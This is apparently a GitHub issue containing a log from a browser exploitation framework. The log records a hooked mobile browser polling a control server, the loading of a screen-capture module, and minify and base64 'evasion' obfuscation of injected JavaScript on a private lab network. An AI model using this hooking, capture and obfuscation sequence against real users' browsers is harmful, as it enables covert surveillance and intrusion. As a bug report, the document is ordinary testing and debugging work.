[23:19:19][>] {"lastseen":"1692573558","count":68,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:20][>] {"lastseen":"1692573559","count":69,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:21][>] {"lastseen":"1692573560","count":70,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:22][>] {"lastseen":"1692573561","count":71,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:22][>] Server: mounted handler '/command/spyder_eye.js'
[23:19:22][>] Hard Load module: 'spyder_eye'
[23:19:23][>] {"lastseen":"1692573562","count":72,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:24][>] {"lastseen":"1692573564","count":73,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:25][>] {"lastseen":"1692573565","count":74,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:26][>] {"lastseen":"1692573566","count":75,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:27][>] Server: mounted handler '/h2c.js'
[23:19:27][*] File [/modules/browser/spyder_eye/html2canvas.min.js] bound to Url [/h2c.js] using Content-type [text/javascript]
[23:19:27][>] [Evasion] Applying technique: minify
[23:19:27][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:19:27][>] [Evasion] Applying technique: base_64
[23:19:27][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:19:27][>] [Evasion] Obfuscation completed (1090 bytes)
[23:19:27][>] {"lastseen":"1692573567","count":76,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
The text was updated successfully, but these errors were encountered: